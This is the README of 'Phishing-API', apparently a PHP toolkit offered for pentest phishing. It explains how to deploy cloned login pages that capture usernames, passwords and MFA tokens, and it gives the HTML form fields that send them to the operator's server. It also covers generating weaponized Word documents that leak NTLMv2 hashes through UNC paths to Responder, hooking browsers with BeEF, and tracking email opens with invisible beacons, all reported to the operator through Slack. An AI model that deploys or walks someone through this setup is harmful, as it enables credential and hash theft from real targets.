/Phishing-API

Comprehensive Web Based Phishing Suite of Tools for Rapid Deployment and Alerting via Slack!

Primary LanguagePHP

Phishing-API

See my blog @ https://curtbraz.blogspot.com/2018/10/phishapi-tool-rapid-deployment-of-fake.html for more details. This API has three main features. One allows you to easily deploy cloned landing pages for credential stealing, another is weaponized Word doc creation, and the third is saved email campaign templates. Both attack methods are integrated into Slack for real-time alerting. I'm currently running this same code for those that don't want to implement their own environment as a free service @ https://phishapi.com!

Update

I've added support for MS Word document generation. Now, simply go to the API to create your payload, email it off, and wait for the Slack notification. It automatically includes a UNC path back as well (as does the Phishing Portal feature) so if you're running Responder in a background session you can capture NTLMv2 hashes and be notified via Slack! Support for weaponizing your own Word doc templates is built in. Just upload an existing doc and download it again to hook it. You can also choose to use Basic Auth which prompts the user for credentials, just like Phishery does!


Auto-Generate Fake Portal


Create Word Maldoc


Weaponize Existing Word Doc


Create or Leverage Saved Email Campaigns

To Setup :

  1. Import the DB SQL Dump Schema to a new MySQL Instance mysql -u root -h localhost < DatabaseSQLDump.sql;

  2. Host the PHP from a web service (Apache, Nginx, IIS, etc)

  3. Configure config.php variables

  4. Limit Access to the "Results" Directories (Apache's Basic Auth is Recommended)

  5. Use SSL and a Domain for the Hosted API

  6. Add your web service account to /etc/sudoers (www-data for apache)

  7. Optionally run Responder and BeEF in a screen session and import the crontab file

1) To Use the API for Capturing Credentials from Fake Sites :

Rapid & Easy Deployment API for Phishing During Pentest Engagements. Output to MySQL/Web Table & Slack Bot. Supports BEEF Hooking & HaveIBeenPwned!


Figure 1: Choose "Fake Portal" From API Options


Figure 2: Choose a Pre-Designed Generic Portal for Landing Page


Figure 3: Fill Out API Details for Landing Page HTML and Optionally Include Your Own Logo


Figure 4: Download Automatically Created Source HTML to Host on a Standalone Server


Figure 5: The Hosted Site's Contents

OR

If you don't wish to use a pre-populated landing page template, feel free to create or clone your own. Just add the following HTML tags to leverage the API for alerting and credential capturing :

  1. Point your HTML Form to https://YOUR-API-HERE

    <FORM METHOD="POST" ACTION="https://YOUR-API-HERE">

  2. Make sure the following authentication fields are set

    <INPUT NAME="username">

    <INPUT NAME="password">

    <INPUT NAME="token"> (OPTIONAL MFA FIELD)

  3. Add hidden input fields for the name of the project and the URL the users should be redirected to after submitting their credentials to you (Recommend Legitimate Login Location - For Best Results Use a Clickjacking Vulnerable URL That Allows iframes)

    <INPUT NAME="project" VALUE="My_Project_Here" TYPE="hidden">

    <INPUT NAME="redirect" VALUE="https://site_to_redirect_to" TYPE="hidden">

  4. Optionally include hidden input fields for altering the Slack bot's behavior (Name and Emoji)

    <INPUT NAME="slackbotname" VALUE="PhishBot" TYPE="hidden">

    <INPUT NAME="slackemoji" VALUE=":fishing_pole_and_fish:" TYPE="hidden">

  5. Sit back and wait for the Slack bot to notify you. When you want to see the credentials visit https://YOUR-API-HERE/results using your basic auth credentials or click the link in the Slack notification.


Figure 6: Someone Entered Credentials into the Fake Portal - Slack Alert


Figure 7: BeEF Hook Slack Alert (Optional in Case You Want to React Quickly w/ Modules)


Figure 8: Captured NTLMv2 Hash Exposed via Browser


Figure 9: Clicking the Slack Link Allows Viewing Credentials





2) To Use the API for Generating Word Doc Payloads :

  1. Modify /phishingdocs/index.php to include your Slack Webhook parameters

  2. Create /var/www/uploads Path and make sure your web user has sudoers access

  3. Browse out to YOUR_URL.com and select "Weaponized Documents" to generate your DOCX

  4. Optionally set up Responder in a background process and run phishinghashes.sh every minute or so with cron

  5. Set up your php.ini to allow uploads of at least 15MB and enable browsecap.ini for parsing UserAgent strings, otherwise some functionality may be limited.

  6. Email your doc and wait for the Slack alerts!

Bonus points if you use your docs as honeypot bait! :)




Figure 1: Web Based Payload Generation - Create New Doc or Upload Existing w/ Payload Options




Figure 2: Opening Document Generated (New) by Service




Figure 3: If "Auth Prompt" is Selected in Payload Options, Display Basic Auth Prompt to User for Credential Capturing (like Phishery)




Figure 4: HTTP Beacon is Selected by Default and Alerts When the Target Opens the Document




Figure 5: If Credentials are Entered from Figure 3 Above, Notify via Slack When Captured




Figure 6: Clicking on the Slack Alert Displays Captured Details (Hashes, Credentials, Client Details)




Figure 7: Slack Alert when UNC/SMB Hashes are Received from Word Document



Currently, I'm running Responder in a Screen session with phishinghashes.sh scheduled via Cron to run every minute to pick up hashes, correlate phished users, and alert via Slack. You can also relay those hashes with another tool if you'd like to take things even further. Enjoy! :)

3) To Use the API to Store and Generate Email Campaign Templates :

Leverage a template by creating or choosing an existing template from the local repository, or, you can compose a blank email and embed the invisible HTML beacon to be notified when the recipient opens their email.



Figure 1: Existing, New, or No Campaign Choices

If a new campaign is chosen, you can create variables for dynamic re-use in the future and store them as HTML templates in a database. The WYSIWYG editor makes things simple, but you can also copy and paste from a text editor or another source if you'd like!



Figure 2: New Campaign w/ Variables & Images

Next time, choosing the existing template will dynamically provide input fields for the stored variables. They can be applied in real time using JavaScript to update the email body. Checking the "Embed Notification for Opened Email" box will automatically append invisible code to your template that will alert you when your recipient opens their email. (Images must be allowed to render for this to work)



Figure 3: Existing Campaign

Sit back and watch as your target opens their email and cross your fingers you later recieve another alert for BeEF, Maldocs, or your captured credentials!



Figure 4: Notification of Email Opened by Recipient

Enjoy! :)